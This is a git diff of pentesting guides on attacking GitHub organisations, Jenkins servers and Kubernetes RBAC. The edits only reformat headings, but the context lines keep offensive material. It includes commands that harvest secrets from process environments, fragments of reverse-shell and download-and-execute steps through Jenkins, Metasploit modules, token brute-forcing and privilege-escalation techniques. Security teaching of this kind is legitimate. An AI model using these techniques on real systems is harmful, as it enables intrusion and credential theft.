* [https://github.com/kootenpv/gittyleaks](https://github.com/kootenpv/gittyleaks)
* [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets)
-## Internal Recon & Attacks
+# Internal Recon & Attacks
For this scenario we are going to suppose that you have obtained some access to a github account.
-### With User Credentials
+## With User Credentials
If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.**
@@ -79,7 +77,7 @@ Note that if you **manage to steal the `user_session` cookie** (currently config
Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful.
-### With User SSH Key
+## With User SSH Key
Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
@@ -95,7 +93,7 @@ If the user has configured its username as his github username you can access th
**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
-#### GPG Keys
+### GPG Keys
As explained [**here**](basic-github-information.md#ssh-keys) sometimes it's needed to sign the commits or you might get discovered.
@@ -105,7 +103,7 @@ Check locally if the current user has any key with:
gpg --list-secret-keys --keyid-format=long
```
-### With User Token
+## With User Token
For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens).
@@ -113,7 +111,7 @@ A user token can be used **instead of a password** for Git over HTTPS, or can be
A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`
-### With Oauth Application
+## With Oauth Application
For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications).
@@ -123,7 +121,7 @@ These are the [scopes an Oauth application can request](https://docs.github.com/
Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
-### With Github Application
+## With Github Application
For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications).
@@ -131,7 +129,7 @@ An attacker might create a **malicious Github Application** to access privileged
Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
-### Enumerate Webhooks
+## Enumerate Webhooks
**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\
However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\
@@ -139,17 +137,17 @@ But in some occasions, people instead of setting the **secret** in its place, th
Webhooks can be set at **repo and at org level**.
-### With Malicious Github Action
+## With Malicious Github Action
For an introduction about [**Github Actions check the basic information**](basic-github-information.md#git-actions).
In case you can **execute arbitrary github actions** in a **repository**, you can **steal the secrets from that repo**.
-#### Github Action Execution from Repo Creation
+### Github Action Execution from Repo Creation
In case members of an organization can **create new repos** and you can execute github actions, you can **create a new repo and steal the secrets set at organization level**.
-#### Github Action from a New Branch
+### Github Action from a New Branch
If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called).
@@ -168,7 +166,7 @@ on:
# Use '**' instead of a branh name to trigger the action in all the cranches
```
-#### Github Action Injection/Backdoor
+### Github Action Injection/Backdoor
In case you somehow managed to **infiltrate inside a Github Action**, if you can escalate privileges you can **steal secrets from the processes where secrets have been set in**. In some cases you don't even need to escalate privileges.
@@ -177,7 +175,7 @@ cat /proc//environ
cat /proc/*/environ | grep -i secret #Suposing the env variable name contains "secret"
```
-#### GITHUB\_TOKEN
+### GITHUB\_TOKEN
This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given by default read and **write permissions** **to the repo**. This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)
@@ -217,7 +215,7 @@ curl -X POST \
Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization.
{% endhint %}
-#### List secrets in Github Action output
+### List secrets in Github Action output
```yaml
name: list_env
@@ -241,7 +239,7 @@ jobs:
secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
-#### Get reverse shell with secrets
+### Get reverse shell with secrets
```yaml
name: revshell
@@ -264,7 +262,7 @@ jobs:
secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
-### Branch Protection Bypass
+## Branch Protection Bypass
* **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB\_TOKEN** you might be able to **approve your PR** and get 1 approval this way.
* _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._
@@ -278,7 +276,7 @@ jobs:
* **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`).
* If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**.
-### Bypass Environments Protections
+## Bypass Environments Protections
For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments).
@@ -294,7 +292,7 @@ Note, that you might find the edge case where **all the branches are protected**
Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets.
-## Persistence
+# Persistence
* Generate **user token**
* Steal **github tokens** from **secrets**
diff --git a/cloud-security/github-security/basic-github-information.md b/cloud-security/github-security/basic-github-information.md
index bf633c26..af7f2b2a 100644
--- a/cloud-security/github-security/basic-github-information.md
+++ b/cloud-security/github-security/basic-github-information.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Basic Github Information
-
-## Basic Structure
+# Basic Structure
The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations** and each of them may contain **several repositories** and **several teams.**. Smaller companies may just **own one organization and no enterprises**.
@@ -29,14 +27,14 @@ Moreover, a user may be **part of different teams** with different enterprise, o
And finally **repositories may have special protection mechanisms**.
-## Privileges
+# Privileges
-### Enterprise Roles
+## Enterprise Roles
* **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository
* **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**.
-### Organization Roles
+## Organization Roles
In an organisation users can have different roles:
@@ -50,7 +48,7 @@ In an organisation users can have different roles:
You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
-### Members Privileges
+## Members Privileges
In _https://github.com/organizations/\/settings/member\_privileges_ you can see the **permissions users will have just for being part of the organisation**.
@@ -64,7 +62,7 @@ The settings here configured will indicate the following permissions of members
* The permissions admins has over the repositories
* If members can create new teams
-### Repository Roles
+## Repository Roles
By default repository roles are created:
@@ -78,39 +76,39 @@ You can **compare the permissions** of each role in this table [https://docs.git
You can also **create your own roles** in _https://github.com/organizations/\/settings/roles_
-### Teams
+## Teams
You can **list the teams created in an organization** in _https://github.com/orgs/\/teams_. Note that to see the teams which are children of other teams you need to access each parent team.
 (1).png>)
-### Users
+## Users
The users of an organization can be **listed** in _https://github.com/orgs/\/people._
In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**.
-## Github Authentication
+# Github Authentication
Github offers different ways to authenticate to your account and perform actions on your behalf.
-### Web Access
+## Web Access
Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**).
-### **SSH Keys**
+## **SSH Keys**
You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys)
-#### **GPG Keys**
+### **GPG Keys**
You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode).
-### **Personal Access Tokens**
+## **Personal Access Tokens**
You can generate personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** to **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens)
-### Oauth Applications
+## Oauth Applications
Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms.
@@ -127,7 +125,7 @@ Some **security recommendations**:
* **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it.
* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
-### Github Applications
+## Github Applications
Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to.
@@ -149,19 +147,19 @@ Some security recommendations:
* If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
-### Deploy keys
+## Deploy keys
Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos.
-### Github Actions
+## Github Actions
This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information.
-## Git Actions
+# Git Actions
Git actions allows to automate the **execution of code when an event happen**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets).
-### Configuration
+## Configuration
In _https://github.com/organizations/\/settings/actions_ it's possible to check the **configuration of the github actions** for the organization.
@@ -169,7 +167,7 @@ It's possible to disallow the use of github actions completely, **allow all gith
It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the \_GITHUB\_TOKEN**\_\*\* of a Github Action when it's run\*\*.
-### Git Secrets
+## Git Secrets
Github Action usually need some kind of secrets to interact with github or third party applications. To **avoid putting them in clear-text** in the repo, github allow to put them as **Secrets**.
@@ -184,7 +182,7 @@ steps:
super_secret: ${{ secrets.SuperSecret }}
```
-#### Example using Bash
+### Example using Bash
```yaml
steps:
@@ -203,7 +201,7 @@ Once configured in the repo or the organizations **users of github won't be able
Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action).
-### Git Environments
+## Git Environments
Github allows to create **environments** where you can save **secrets**. Then, you can give the github action access to the secrets inside the environment with something like:
@@ -216,7 +214,7 @@ jobs:
You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.
-### Git Action Box
+## Git Action Box
A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user.
@@ -230,7 +228,7 @@ It's **not possible to run a Github Action of an organization inside a self host
If the custom **Github Runner is configured in a machine inside AWS or GCP** for example, the Action **could have access to the metadata endpoint** and **steal the token of the service account** the machine is running with.
-### Git Action Compromise
+## Git Action Compromise
If all actions (or a malicious action) are allowed a user could use a **Github action** that is **malicious** and will **compromise** the **container** where it's being executed.
@@ -242,7 +240,7 @@ A **malicious Github Action** run could be **abused** by the attacker to:
* **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**.
{% endhint %}
-## Branch Protections
+# Branch Protections
Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
@@ -271,7 +269,7 @@ Different protections can be applied to a branch (like to master):
As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline.
{% endhint %}
-## References
+# References
* [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization)
* [https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)[https://docs.github.com/en/enterprise-server](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)
diff --git a/cloud-security/jenkins.md b/cloud-security/jenkins.md
index 5a583bb0..5cdaca9e 100644
--- a/cloud-security/jenkins.md
+++ b/cloud-security/jenkins.md
@@ -17,14 +17,12 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Jenkins
-
-## Basic Information
+# Basic Information
Jenkins offers a simple way to set up a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **languages** and source code repositories using pipelines, as well as automating other routine development tasks. While Jenkins doesn’t eliminate the **need to create scripts for individual steps**, it does give you a faster and more robust way to integrate your entire chain of build, test, and deployment tools than you can easily build yourself.\
Definition from [here](https://www.infoworld.com/article/3239666/what-is-jenkins-the-ci-server-explained.html).
-## Unauthenticated Enumeration
+# Unauthenticated Enumeration
In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use:
@@ -44,12 +42,12 @@ You may be able to get the Jenkins version from the path _**/oops**_ or _**/erro
.png>)
-## Login
+# Login
You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**\
Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
-### Bruteforce
+## Bruteforce
**Jekins** does **not** implement any **password policy** or username **brute-force mitigation**. Then, you **should** always try to **brute-force** users because probably **weak passwords** are being used (even **usernames as passwords** or **reverse** usernames as passwords).
@@ -57,33 +55,33 @@ Also if **SSO** **functionality**/**plugins** were present then you should attem
msf> use auxiliary/scanner/http/jenkins_login
```
-## Jenkins Abuses
+# Jenkins Abuses
-### Known Vulnerabilities
+## Known Vulnerabilities
{% embed url="https://github.com/gquere/pwn_jenkins" %}
-### Dumping builds to find cleartext secrets
+## Dumping builds to find cleartext secrets
Use [this script](https://github.com/gquere/pwn\_jenkins/blob/master/dump\_builds/jenkins\_dump\_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets.
-### Password spraying
+## Password spraying
Use [this python script](https://github.com/gquere/pwn\_jenkins/blob/master/password\_spraying/jenkins\_password\_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray).
-### Decrypt Jenkins secrets offline
+## Decrypt Jenkins secrets offline
Use [this script](https://github.com/gquere/pwn\_jenkins/blob/master/offline\_decryption/jenkins\_offline\_decrypt.py) to decrypt previsously dumped secrets.
-### Decrypt Jenkins secrets from Groovy
+## Decrypt Jenkins secrets from Groovy
```
println(hudson.util.Secret.decrypt("{...}"))
```
-## Code Execution
+# Code Execution
-### **Create a new project**
+## **Create a new project**
This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project).
@@ -104,7 +102,7 @@ If you are allowed to configure the project you can **make it execute commands w
Click on **Save** and **build** the project and your **command will be executed**.\
If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
-### **Execute Groovy script**
+## **Execute Groovy script**
Best way. Less noisy.
@@ -132,7 +130,7 @@ proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```
-### Reverse shell in linux
+## Reverse shell in linux
```python
def sout = new StringBuffer(), serr = new StringBuffer()
@@ -142,7 +140,7 @@ proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```
-### Reverse shell in windows
+## Reverse shell in windows
You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it:
@@ -152,7 +150,7 @@ echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc
```
-### MSF exploit
+## MSF exploit
You can use MSF to get a reverse shell:
@@ -160,15 +158,15 @@ You can use MSF to get a reverse shell:
msf> use exploit/multi/http/jenkins_script_console
```
-## POST
+# POST
-### Metasploit
+## Metasploit
```
msf> post/multi/gather/jenkins_gather
```
-### Files to copy after compromission
+## Files to copy after compromission
These files are needed to decrypt Jenkins secrets:
@@ -186,7 +184,7 @@ Here's a regexp to find them:
grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
```
-## References
+# References
{% embed url="https://github.com/gquere/pwn_jenkins" %}
diff --git a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md
index 6d89fd4c..95dbc1a3 100644
--- a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md
+++ b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md
@@ -17,12 +17,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Abusing Roles/ClusterRoles in Kubernetes
-
Here you can find some potentially dangerous Roles and ClusterRoles configurations.\
Remember that you can get all the supported resources with `kubectl api-resources`
-## **Privilege Escalation**
+# **Privilege Escalation**
Referring as the art of getting **access to a different principal** within the cluster **with different privileges** (within the kubernetes cluster or to external clouds) than the ones you already have, in Kubernetes there are basically **4 main techniques to escalate privileges**:
@@ -32,7 +30,7 @@ Referring as the art of getting **access to a different principal** within the c
* Be able to **escape to the node** from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any)
* A fifth technique that deserves a mention is the ability to **run port-forward** in a pod, as you may be able to access interesting resources within that pod.
-### **Access Any Resource or Verb**
+## **Access Any Resource or Verb**
This privilege provides access to **any resource with any verb**. It is the most substantial privilege that a user can get, especially if this privilege is also a “ClusterRole.” If it’s a “ClusterRole,” than the user can access the resources of any namespace and own the cluster with that permission.
@@ -48,7 +46,7 @@ rules:
verbs: ["*"]
```
-### **Access Any Resource**
+## **Access Any Resource**
Giving a user permission to **access any resource can be very risky**. But, **which verbs** allow access to these resources? Here are some dangerous RBAC permissions that can damage the whole cluster:
@@ -68,7 +66,7 @@ rules:
verbs: ["create", "list", "get"]
```
-### Pod Create - Steal Token
+## Pod Create - Steal Token
An attacker with permission to create a pod in the “kube-system” namespace can create cryptomining containers for example. Moreover, if there is a **service account with privileged permissions, by running a pod with that service the permissions can be abused to escalate privileges**.
@@ -105,7 +103,7 @@ So just create the malicious pod and expect the secrets in port 6666:
.png>)
-### **Pod Create & Escape**
+## **Pod Create & Escape**
The following definition gives all the privileges a container can have:
@@ -170,7 +168,7 @@ Now that you can escape to the node check post-exploitation techniques in:
[attacking-kubernetes-from-inside-a-pod.md](../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
{% endcontent-ref %}
-#### Stealth
+### Stealth
You probably want to be **stealthier**, in the following pages you can see what you would be able to access if you create a pod only enabling some of the mentioned privileges in the previous template:
@@ -183,7 +181,7 @@ You probably want to be **stealthier**, in the following pages you can see what
_You can find example of how to create/abuse the previous privileged pods configurations in_ [_https://github.com/BishopFox/badPods_](https://github.com/BishopFox/badPods)\_\_
-### Pod Create - Move to cloud
+## Pod Create - Move to cloud
If you can **create** a **pod** (and optionally a **service account**) you might be able to **obtain privileges in cloud environment** by **assigning cloud roles to a pod or a service account** and then accessing it.\
Moreover, if you can create a **pod with the host network namespace** you can **steal the IAM** role of the **node** instance.
@@ -194,7 +192,7 @@ For more information check:
[kubernetes-access-to-other-clouds.md](../kubernetes-access-to-other-clouds.md)
{% endcontent-ref %}
-### **Create/Patch Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs**
+## **Create/Patch Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs**
Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs are all privileges that allow the creation of different tasks in the cluster. Moreover, it's possible can use all of them to **develop pods and even create pods**. So it's possible to a**buse them to escalate privileges just like in the previous example.**
@@ -233,7 +231,7 @@ Kubernetes API documentation indicates that the “**PodTemplateSpec**” endpoi
**So, the privilege to create or update tasks can also be abused for privilege escalation in the cluster.**
-### **Pods Exec**
+## **Pods Exec**
**Pod exec** is an option in kubernetes used for **running commands in a shell inside a pod**. This privilege is meant for administrators who want to **access containers and run commands**. It’s just like creating a SSH session for the container.
@@ -245,7 +243,7 @@ kubectl exec -it -n -- sh
Note that as you can get inside any pod, you can abuse other pods token just like in [**Pod Creation exploitation**](./#pod-creation) to try to escalate privileges.
-### port-forward
+## port-forward
This permission allows to **forward one local port to one port in the specified pod**. This is meant to be able to debug applications running inside a pod easily, but an attacker might abuse it to get access to interesting (like DBs) or vulnerable applications (webs?) inside a pod:
@@ -253,7 +251,7 @@ This permission allows to **forward one local port to one port in the specified
kubectl port-forward pod/mypod 5000:5000
```
-### **Hosts Writable /var/log/ Escape**
+## **Hosts Writable /var/log/ Escape**
As [**indicated in this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html)\*\*,\*\*If you can access or create a pod with the **hosts `/var/log/` directory mounted** on it, you can **escape from the container**.\
This is basically because the when the **Kube-API tries to get the logs** of a container (using `kubectl logs `), it **requests the `0.log`** file of the pod using the `/logs/` endpoint of the **Kubelet** service.\
@@ -287,7 +285,7 @@ curl -k -H 'Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6Im[...]' 'https://
**A laboratory and automated exploit can be found in** [**https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts**](https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts)
-#### Bypassing readOnly protection
+### Bypassing readOnly protection
If you are lucky enough and the highly privileged capability capability `CAP_SYS_ADMIN` is available, you can just remount the folder as rw:
@@ -295,7 +293,7 @@ If you are lucky enough and the highly privileged capability capability `CAP_SYS
mount -o rw,remount /hostlogs/
```
-#### Bypassing hostPath readOnly protection
+### Bypassing hostPath readOnly protection
As stated in [**this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html) it’s possible to bypass the protection:
@@ -353,7 +351,7 @@ spec:
name: task-pv-storage-vol
```
-### **Impersonating privileged accounts**
+## **Impersonating privileged accounts**
With a [**user impersonation**](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation) privilege, an attacker could impersonate a privileged account.
@@ -377,7 +375,7 @@ curl -k -v -XGET -H "Authorization: Bearer " \
https://:/api/v1/namespaces/kube-system/secrets/
```
-### **Listing Secrets**
+## **Listing Secrets**
The **listing secrets privilege** is a strong capability to have in the cluster. A user with the permission to list secrets can **potentially view all the secrets in the cluster – including the admin keys**. The secret key is a JWT token encoded in base64.
@@ -391,7 +389,7 @@ curl -v -H "Authorization: Bearer " https://:/api/v1
-### **Reading a secret – brute-forcing token IDs**
+## **Reading a secret – brute-forcing token IDs**
An attacker that found a token with permission to read a secret can’t use this permission without knowing the full secret’s name. This permission is different from the _**listing** **secrets**_ permission described above.
@@ -419,7 +417,7 @@ This means that there are 275 = 14,348,907 possibilities for a token.
An attacker can run a brute-force attack to guess the token ID in couple of hours. Succeeding to get secrets from default sensitive service accounts will allow him to escalate privileges.
-## Built-in Privileged Escalation Prevention
+# Built-in Privileged Escalation Prevention
Although there can be risky permissions, Kubernetes is doing good work preventing other types of permissions with potential for privileged escalation.
@@ -445,7 +443,7 @@ After trying to do so, we will receive an error “forbidden: attempt to grant e
-### **Get & Patch RoleBindings/ClusterRoleBindings**
+## **Get & Patch RoleBindings/ClusterRoleBindings**
{% hint style="danger" %}
**Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section. Yo cannot create/modify a rolebinding to give yourself or a different SA some privileges if you don't have already.**
@@ -501,13 +499,13 @@ curl -k -v -X POST -H "Authorization: Bearer "\
https://:/api/v1/namespaces/kube-system/secret
```
-## Other Attacks
+# Other Attacks
-### S**idecar proxy app**
+## S**idecar proxy app**
By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod.
-#### Create a sidecar proxy app
+### Create a sidecar proxy app
Create your .yaml
@@ -552,7 +550,7 @@ kubectl logs app -C proxy
More info at: [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
-### Malicious Admission Controller
+## Malicious Admission Controller
An admission controller is a piece of code that **intercepts requests to the Kubernetes API server** before the persistence of the object, but **after the request is authenticated** **and authorized**.
@@ -596,7 +594,7 @@ kubectl describe po nginx | grep "Image: "
As you can see in the above image, we tried running image `nginx` but the final executed image is `rewanthtammana/malicious-image`. What just happened!!?
-#### Technicalities
+### Technicalities
We will unfold what just happened. The `./deploy.sh` script that you executed, created a mutating webhook admission controller. The below lines in the mutating webhook admission controller are responsible for the above results.
@@ -610,9 +608,9 @@ patches = append(patches, patchOperation{
The above snippet replaces the first container image in every pod with `rewanthtammana/malicious-image`.
-## Best Practices
+# Best Practices
-### **Prevent service account token automounting on pods**
+## **Prevent service account token automounting on pods**
When a pod is being created, it automatically mounts a service account (the default is default service account in the same namespace). Not every pod needs the ability to utilize the API from within itself.
@@ -626,15 +624,15 @@ It is also possible to use it on the pod:\\
-### **Grant specific users to RoleBindings\ClusterRoleBindings**
+## **Grant specific users to RoleBindings\ClusterRoleBindings**
When creating RoleBindings\ClusterRoleBindings, make sure that only the users that need the role in the binding are inside. It is easy to forget users that are not relevant anymore inside such groups.
-### **Use Roles and RoleBindings instead of ClusterRoles and ClusterRoleBindings**
+## **Use Roles and RoleBindings instead of ClusterRoles and ClusterRoleBindings**
When using ClusterRoles and ClusterRoleBindings, it applies on the whole cluster. A user in such a group has its permissions over all the namespaces, which is sometimes unnecessary. Roles and RoleBindings can be applied on a specific namespace and provide another layer of security.
-### **Use automated tools**
+## **Use automated tools**
{% embed url="https://github.com/cyberark/KubiScan" %}
@@ -642,7 +640,7 @@ When using ClusterRoles and ClusterRoleBindings, it applies on the whole cluster
{% embed url="https://github.com/aquasecurity/kube-bench" %}
-## **References**
+# **References**
{% embed url="https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions" %}
diff --git a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md
index 6e079e05..4e1ee0e0 100644
--- a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md
+++ b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# K8s Roles Abuse Lab
-
You can run these labs just inside **minikube**.
-## Pod Creation -> Escalate to ns SAs
+# Pod Creation -> Escalate to ns SAs
We are going to create:
@@ -128,7 +126,7 @@ kubectl delete role test-r
kubectl delete serviceaccount test-sa
```
-## Create Daemonset
+# Create Daemonset
```bash
# Create Service Account test-sa
@@ -226,7 +224,7 @@ kubectl delete role test-r
kubectl delete serviceaccount test-sa
```
-### Patch Daemonset
+## Patch Daemonset
In this case we are going to **patch a daemonset** to make its pod load our desired service account.
@@ -347,9 +345,9 @@ kubectl delete role test-r
kubectl delete serviceaccount test-sa
```
-## Doesn't work
+# Doesn't work
-### Create/Patch Bindings
+## Create/Patch Bindings
**Doesn't work:**
@@ -439,7 +437,7 @@ kubectl delete serviceaccount test-sa
kubectl delete serviceaccount test-sa2
```
-### Bind explicitly Bindings
+## Bind explicitly Bindings
In the "Privilege Escalation Prevention and Bootstrapping" section of [https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/](https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/) it's mentioned that if a SA can create a Binding and has explicitly Bind permissions over the Role/Cluster role, it can create bindings even using Roles/ClusterRoles with permissions that it doesn't have.\
However, it didn't work for me:
@@ -576,7 +574,7 @@ kubectl delete serviceaccount test-sa
kubectl delete serviceaccount test-sa2
```
-### Arbitrary roles creation
+## Arbitrary roles creation
In this example we try to create a role having the permissions create and path over the roles resources. However, K8s prevent us from creating a role with more permissions the principal creating is has:
@@ -610,7 +608,7 @@ roleRef:
' | kubectl apply -f -
# Try to create a role over all the resources with "create" and "patch"
-## This won't wotrk
+# This won't wotrk
echo 'kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
diff --git a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md
index b1867009..a6089cd9 100644
--- a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md
+++ b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Pod Escape Privileges
-
-## Privileged and hostPID
+# Privileged and hostPID
With these privileges you will have **access to the hosts processes** and **enough privileges to enter inside the namespace of one of the host processes**.\
Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp).
@@ -51,7 +49,7 @@ spec:
